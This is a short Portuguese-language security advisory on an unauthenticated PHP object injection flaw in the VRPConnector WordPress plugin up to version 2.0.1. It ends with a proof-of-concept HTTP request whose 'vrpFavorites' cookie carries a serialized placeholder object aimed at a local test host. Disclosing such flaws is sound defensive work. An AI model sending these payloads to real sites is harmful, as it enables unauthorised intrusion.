
VRPConnector <= 2.0.1 - Injeção de Objetos PHP Não Autenticada
VRPConnector <= 2.0.1 - Injeção de Objeto PHP Não Autenticada
O plugin VRPConnector para WordPress é vulnerável a Injeção de Objeto PHP nas versões até, e incluindo, 2.0.1 através da desserialização de entrada não confiável. Isso possibilita que atacantes não autenticados injetem um Objeto PHP. Nenhuma cadeia POP conhecida está presente no software vulnerável. Se uma cadeia POP estiver presente através de um plugin ou tema adicional instalado no sistema alvo, isso poderia permitir que o atacante exclua arquivos arbitrários, recupere dados sensíveis ou execute código.
GET / HTTP/1.1
Host: kubernetes.docker.internal:8929
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: vrpFavorites=O:20:"PHP_Object_Injection":0:{}
Upgrade-Insecure-Requests: 1
Priority: u=0, i